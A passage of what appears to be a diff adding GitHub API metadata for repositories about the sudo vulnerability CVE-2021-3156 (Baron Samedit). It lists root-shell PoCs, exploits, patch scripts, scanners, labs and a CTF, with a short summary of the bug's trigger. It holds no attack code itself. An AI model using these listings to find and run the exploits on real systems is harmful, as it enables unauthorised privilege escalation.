"2021-02-01T02:19:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334506851, + "name": "CVE-2021-3156", + "full_name": "blasty\/CVE-2021-3156", + "owner": { + "login": "blasty", + "id": 101374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101374?v=4", + "html_url": "https:\/\/github.com\/blasty", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blasty\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-30T20:39:58Z", + "updated_at": "2024-11-26T09:51:32Z", + "pushed_at": "2021-02-02T17:07:09Z", + "stargazers_count": 960, + "watchers_count": 960, + "has_discussions": false, + "forks_count": 237, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 237, + "watchers": 960, + "score": 0, + "subscribers_count": 27 + }, + { + "id": 334565393, + "name": "CVE-2021-3156", + "full_name": "teamtopkarl\/CVE-2021-3156", + "owner": { + "login": "teamtopkarl", + "id": 18065690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18065690?v=4", + "html_url": "https:\/\/github.com\/teamtopkarl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teamtopkarl\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-01-31T03:38:37Z", + "updated_at": "2023-09-06T17:57:12Z", + "pushed_at": "2021-01-31T04:02:08Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 334594270, + "name": "CVE-2021-3156", + "full_name": "Q4n\/CVE-2021-3156", + "owner": { + "login": "Q4n", + "id": 48317526, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48317526?v=4", + "html_url": "https:\/\/github.com\/Q4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Q4n\/CVE-2021-3156", + "description": "复现别人家的CVEs系列", + "fork": false, + "created_at": "2021-01-31T07:01:50Z", + "updated_at": "2022-11-09T18:11:04Z", + "pushed_at": "2021-01-31T07:02:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 334697314, + "name": "CVE-2021-3156", + "full_name": "kal1gh0st\/CVE-2021-3156", + "owner": { + "login": "kal1gh0st", + "id": 56889513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4", + "html_url": "https:\/\/github.com\/kal1gh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kal1gh0st\/CVE-2021-3156", + "description": "Description Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via \"sudoedit -s\" and a command-line argument that ends with a single backslash character. ", + "fork": false, + "created_at": "2021-01-31T16:10:11Z", + "updated_at": "2021-12-15T00:43:34Z", + "pushed_at": "2021-05-04T14:41:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334775019, + "name": "docker-CVE-2021-3156", + "full_name": "apogiatzis\/docker-CVE-2021-3156", + "owner": { + "login": "apogiatzis", + "id": 39923420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39923420?v=4", + "html_url": "https:\/\/github.com\/apogiatzis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apogiatzis\/docker-CVE-2021-3156", + "description": "A docker environment to research CVE-2021-3156", + "fork": false, + "created_at": "2021-01-31T22:58:13Z", + "updated_at": "2024-08-12T20:09:57Z", + "pushed_at": "2021-01-31T23:03:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 334790116, + "name": "CVE-2021-3156", + "full_name": "voidlsd\/CVE-2021-3156", + "owner": { + "login": "voidlsd", + "id": 46201891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46201891?v=4", + "html_url": "https:\/\/github.com\/voidlsd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/voidlsd\/CVE-2021-3156", + "description": "a simple script to patch CVE-2021-3156 (heap based buffer overflow via sudo).", + "fork": false, + "created_at": "2021-02-01T00:41:55Z", + "updated_at": "2021-02-01T00:42:21Z", + "pushed_at": "2021-02-01T00:42:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 334914030, + "name": "CVE-2021-3156-Patch", + "full_name": "Ashish-dawani\/CVE-2021-3156-Patch", + "owner": { + "login": "Ashish-dawani", + "id": 11299833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11299833?v=4", + "html_url": "https:\/\/github.com\/Ashish-dawani", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ashish-dawani\/CVE-2021-3156-Patch", + "description": "Patch Script for CVE-2021-3156 Heap Overflow", + "fork": false, + "created_at": "2021-02-01T10:35:03Z", + "updated_at": "2021-02-01T11:24:51Z", + "pushed_at": "2021-02-01T11:24:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 335050084, + "name": "ScannerCVE-2021-3156", + "full_name": "SantiagoSerrao\/ScannerCVE-2021-3156", + "owner": { + "login": "SantiagoSerrao", + "id": 49415402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49415402?v=4", + "html_url": "https:\/\/github.com\/SantiagoSerrao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SantiagoSerrao\/ScannerCVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-02-01T18:46:34Z", + "updated_at": "2021-09-28T20:54:25Z", + "pushed_at": "2021-02-01T18:50:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 335558169, + "name": "CTF-2021", + "full_name": "DanielAzulayy\/CTF-2021", + "owner": { + "login": "DanielAzulayy", + "id": 69147968, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69147968?v=4", + "html_url": "https:\/\/github.com\/DanielAzulayy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanielAzulayy\/CTF-2021", + "description": "CTF for HDE 64 students at See Security College. Exploit a JWT (web part) & CVE-2021-3156 (LPE part).", + "fork": false, + "created_at": "2021-02-03T08:36:01Z", + "updated_at": "2021-05-05T10:52:48Z", + "pushed_at": "2021-03-05T16:22:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ctf", + "lpe", + "users-solving" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 335565227, + "name": "Serpentiel-CVE-2021-3156", + "full_name": "cdeletre\/Serpentiel-CVE-2021-3156", + "owner": { + "login": "cdeletre", + "id": 12409537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12409537?v=4", + "html_url": "https:\/\/github.com\/cdeletre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdeletre\/Serpentiel-CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-02-03T09:04:14Z", + "updated_at": "2021-10-12T18:17:20Z", + "pushed_at": "2021-02-03T09:04:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335576846, + "name": "CVE-2021-3156", + "full_name": "dinhbaouit\/CVE-2021-3156", + "owner": { + "login": "dinhbaouit", + "id": 17717385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4", + "html_url": "https:\/\/github.com\/dinhbaouit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-3156", + "description": "CVE-2021-3156 Vagrant Lab", + "fork": false, + "created_at": "2021-02-03T09:48:46Z", + "updated_at": "2022-11-09T18:11:06Z", + "pushed_at": "2021-02-03T10:58:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335739221, + "name": "CVE-2021-3156", + "full_name": "CptGibbon\/CVE-2021-3156", + "owner": { + "login": "CptGibbon", + "id": 16000770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16000770?v=4", + "html_url": "https:\/\/github.com\/CptGibbon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CptGibbon\/CVE-2021-3156", + "description": "Root shell PoC for CVE-2021-3156", + "fork": false, + "created_at": "2021-02-03T19:57:56Z", + "updated_at": "2024-10-16T20:11:47Z", + "pushed_at": "2022-02-13T12:21:53Z", + "stargazers_count": 145, + "watchers_count": 145, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 61, + "watchers": 145, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 336220602, + "name": "sudo-1.8.3p1-patched", + "full_name": "perlun\/sudo-1.8.3p1-patched", + "owner": { + "login": "perlun", + "id": 630613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/630613?v=4", + "html_url": "https:\/\/github.com\/perlun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/perlun\/sudo-1.8.3p1-patched", + "description": "Custom version of sudo 1.8.3p1 with CVE-2021-3156 patches applied", + "fork": false, + "created_at": "2021-02-05T09:13:17Z", + "updated_at": "2021-02-05T09:25:37Z", + "pushed_at": "2021-02-05T09:25:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 336638175, + "name": "CVE-2021-3156-PoC", + "full_name": "1N53C\/CVE-2021-3156-PoC", + "owner": { + "login": "1N53C", + "id": 34792428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34792428?v=4", + "html_url": "https:\/\/github.com\/1N53C", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1N53C\/CVE-2021-3156-PoC", + "description": null, + "fork": false, + "created_at": "2021-02-06T21:16:11Z", + "updated_at": "2023-03-09T02:25:06Z", + "pushed_at": "2021-02-06T21:20:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 337169035, + "name": "CVE-2021-3156", + "full_name": "0xdevil\/CVE-2021-3156", + "owner": { + "login": "0xdevil", + "id": 52781556, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52781556?v=4", + "html_url": "https:\/\/github.com\/0xdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xdevil\/CVE-2021-3156", + "description": "CVE-2021-3156: Sudo heap overflow exploit for Debian 10", + "fork": false, + "created_at": "2021-02-08T18:21:58Z", + "updated_at": "2024-09-18T23:14:12Z", + "pushed_at": "2021-12-03T14:34:18Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 51, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 337321053, + "name": "cve-2021-3156", + "full_name": "gmldbd94\/cve-2021-3156", + "owner": { + "login": "gmldbd94", + "id": 26623299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26623299?v=4", + "html_url": "https:\/\/github.com\/gmldbd94", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmldbd94\/cve-2021-3156", + "description": "보안취약점 확인", + "fork": false, + "created_at": "2021-02-09T07:06:49Z", + "updated_at": "2021-02-09T07:22:16Z", + "pushed_at": "2021-02-09T07:22:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 337331342, + "name": "CVE-2021-3156", + "full_name": "jm33-m0\/CVE-2021-3156", + "owner": { + "login": "jm33-m0", + "id": 10167884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10167884?v=4", + "html_url": "https:\/\/github.com\/jm33-m0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jm33-m0\/CVE-2021-3156", + "description": "sudo heap overflow to LPE, in Go", + "fork": false, + "created_at": "2021-02-09T07:55:47Z", + "updated_at": "2024-08-12T20:10:13Z", + "pushed_at": "2021-02-09T08:11:04Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 337512578, + "name": "CVE-2021-3156-plus", + "full_name": "Rvn0xsy\/CVE-2021-3156-plus", + "owner": { + "login": "Rvn0xsy", + "id": 19944759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19944759?v=4", + "html_url": "https:\/\/github.com\/Rvn0xsy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rvn0xsy\/CVE-2021-3156-plus", + "description": "CVE-2021-3156非交互式执行命令", + "fork": false, + "created_at": "2021-02-09T19:25:18Z", + "updated_at": "2024-11-05T09:46:21Z", + "pushed_at": "2021-02-09T19:31:33Z", + "stargazers_count": 199, + "watchers_count": 199, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 199, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 338208683, + "name": "how-to-solve-sudo-heap-based-bufferoverflow-vulnerability", + "full_name": "r3k4t\/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability", + "owner": { + "login": "r3k4t", + "id": 69615463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69615463?v=4", + "html_url": "https:\/\/github.com\/r3k4t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3k4t\/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability", + "description": "How to solve Sudo Heap-Based Buffer Overflow Vulnerability — CVE-2021-3156?", + "fork": false, + "created_at": "2021-02-12T02:44:30Z", + "updated_at": "2022-12-21T07:01:25Z", + "pushed_at": "2021-02-12T10:21:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 341413027, + "name": "CVE-2021-3156", + "full_name": "oneoy\/CVE-2021-3156", + "owner": { + "login": "oneoy", + "id": 38435398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4", + "html_url": "https:\/\/github.com\/oneoy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-02-23T03:14:36Z", + "updated_at": "2024-08-12T20:10:36Z", + "pushed_at": "2021-02-23T03:14:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 348065462, + "name": "CVE-2021-3156", + "full_name": "worawit\/CVE-2021-3156", + "owner": { + "login": "worawit", + "id": 1352296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1352296?v=4", + "html_url": "https:\/\/github.com\/worawit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/worawit\/CVE-2021-3156", + "description": "Sudo Baron Samedit Exploit", + "fork": false, + "created_at": "2021-03-15T17:37:02Z", + "updated_at": "2024-11-08T06:25:11Z", + "pushed_at": "2022-01-13T05:48:01Z", + "stargazers_count": 737, + "watchers_count": 737, + "has_discussions": false, + "forks_count": 168, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 168, + "watchers": 737, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 349444222, + "name": "CVE-2021-3156", + "full_name": "lmol\/CVE-2021-3156", + "owner": { + "login": "lmol", + "id": 1568731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1568731?v=4", + "html_url": "https:\/\/github.com\/lmol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lmol\/CVE-2021-3156", + "description": "Exploit generator for sudo CVE-2021-3156", + "fork": false, + "created_at": "2021-03-19T14:06:09Z", + "updated_at": "2022-03-16T16:30:23Z", + "pushed_at": "2021-03-25T23:52:40Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 352891561, + "name": "CVE-2021-3156", + "full_name": "BearCat4\/CVE-2021-3156", + "owner": { + "login": "BearCat4", + "id": 42698332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42698332?v=4", + "html_url": "https:\/\/github.com\/BearCat4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BearCat4\/CVE-2021-3156", + "description": "CVE-2021-3156漏洞修复Shell", + "fork": false, + "created_at": "2021-03-30T06:17:44Z", + "updated_at": "2022-08-22T03:19:22Z", + "pushed_at": "2021-03-30T06:58:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354429117, + "name": "CVE-2021-3156", + "full_name": "ZTK-009\/CVE-2021-3156", + "owner": { + "login": "ZTK-009", + "id": 29515145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29515145?v=4", + "html_url": "https:\/\/github.com\/ZTK-009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZTK-009\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-04-04T01:15:05Z", + "updated_at": "2021-04-04T01:15:15Z", + "pushed_at": "2021-04-04T01:15:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354924420, + "name": "CVE-2021-3156", + "full_name": "capturingcats\/CVE-2021-3156", + "owner": { + "login": "capturingcats", + "id": 81662965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81662965?v=4", + "html_url": "https:\/\/github.com\/capturingcats", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/capturingcats\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-04-05T18:00:43Z", + "updated_at": "2021-04-05T18:39:34Z", + "pushed_at": "2021-04-05T18:03:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 362713324, + "name": "pwnedit", + "full_name": "LiveOverflow\/pwnedit", + "owner": { + "login": "LiveOverflow", + "id": 12161158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12161158?v=4", + "html_url": "https:\/\/github.com\/LiveOverflow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LiveOverflow\/pwnedit", + "description": "CVE-2021-3156 - Sudo Baron Samedit", + "fork": false, + "created_at": "2021-04-29T06:29:26Z", + "updated_at": "2024-11-27T06:27:28Z", + "pushed_at": "2022-02-12T19:33:07Z", + "stargazers_count": 220, + "watchers_count": 220, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 35, + "watchers": 220, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 364464496, + "name": "CVE-2021-3156-Mitigation-ShellScript-Build", + "full_name": "ajtech-hue\/CVE-2021-3156-Mitigation-ShellScript-Build", + "owner": { + "login": "ajtech-hue", + "id": 60117733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60117733?v=4", + "html_url": "https:\/\/github.com\/ajtech-hue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajtech-hue\/CVE-2021-3156-Mitigation-ShellScript-Build", + "description": null, + "fork": false, + "created_at": "2021-05-05T04:51:03Z", + "updated_at": "2021-05-05T04:58:52Z", + "pushed_at": "2021-05-05T04:58:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 380136612, + "name": "CVE-2021-3156", + "full_name": "donghyunlee00\/CVE-2021-3156", + "owner": { + "login": "donghyunlee00", + "id": 26313346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26313346?v=4", + "html_url": "https:\/\/github.com\/donghyunlee00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/donghyunlee00\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-06-25T05:45:11Z", + "updated_at": "2021-06-25T06:11:02Z", + "pushed_at": "2021-06-25T06:10:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 381790796, + "name": "CVE-2021-3156", + "full_name": "TheFlash2k\/CVE-2021-3156", + "owner": { + "login": "TheFlash2k", + "id": 19727349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19727349?v=4", + "html_url": "https:\/\/github.com\/TheFlash2k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheFlash2k\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-06-30T18:00:03Z", + "updated_at": "2022-11-09T18:12:46Z", + "pushed_at": "2021-06-30T18:00:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 389541328, + "name": "CVE-2021-3156", + "full_name": "Exodusro\/CVE-2021-3156", + "owner": { + "login": "Exodusro", + "id": 27811489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27811489?v=4", + "html_url": "https:\/\/github.com\/Exodusro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exodusro\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-07-26T07:08:55Z", + "updated_at": "2021-10-21T21:30:42Z", + "pushed_at": "2021-07-25T23:01:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 393627940, + "name": "CVE-2021-3156", + "full_name": "CyberCommands\/CVE-2021-3156", + "owner": { + "login": "CyberCommands", + "id": 78230607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78230607?v=4", + "html_url": "https:\/\/github.com\/CyberCommands", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberCommands\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-08-07T08:38:50Z", + "updated_at": "2021-08-07T08:43:21Z", + "pushed_at": "2021-08-07T08:43:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 395682414, + "name": "CVE-2021-3156", + "full_name": "0x7183\/CVE-2021-3156", + "owner": { + "login": "0x7183", + "id": 75803943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75803943?v=4", + "html_url": "https:\/\/github.com\/0x7183", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7183\/CVE-2021-3156", + "description": "Sudo Heap Overflow Baron Samedit", + "fork": false, + "created_at": "2021-08-13T14:23:09Z", + "updated_at": "2021-11-18T11:57:37Z", + "pushed_at": "2021-10-12T20:51:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410319200, + "name": "sudo-exploit", + "full_name": "redhawkeye\/sudo-exploit", + "owner": { + "login": "redhawkeye", + "id": 90817826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90817826?v=4", + "html_url": "https:\/\/github.com\/redhawkeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redhawkeye\/sudo-exploit", + "description": "CVE-2021-3156 - sudo exploit for ubuntu 18.04 & 20.04", + "fork": false, + "created_at": "2021-09-25T16:11:19Z", + "updated_at": "2024-10-27T23:40:31Z", + "pushed_at": "2021-09-25T16:13:19Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410761927, + "name": "CVE-2021-3156", + "full_name": "d3c3ptic0n\/CVE-2021-3156", + "owner": { + "login": "d3c3ptic0n", + "id": 50361425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50361425?v=4", + "html_url": "https:\/\/github.com\/d3c3ptic0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3c3ptic0n\/CVE-2021-3156", + "description": "Sudo heap-based buffer overflow privilege escalation commands and mitigations.", + "fork": false, + "created_at": "2021-09-27T06:09:06Z", + "updated_at": "2021-10-29T14:15:54Z", + "pushed_at": "2021-08-16T01:26:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 416842203, + "name": "CVE-2021-3156", + "full_name": "musergi\/CVE-2021-3156", + "owner": { + "login": "musergi", + "id": 39805012, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39805012?v=4", + "html_url": "https:\/\/github.com\/musergi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/musergi\/CVE-2021-3156", + "description": null, + "fork": false, + "created_at": "2021-10-13T17:43:51Z", + "updated_at": "2021-12-03T00:25:23Z", + "pushed_at": "2021-12-01T13:51:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + 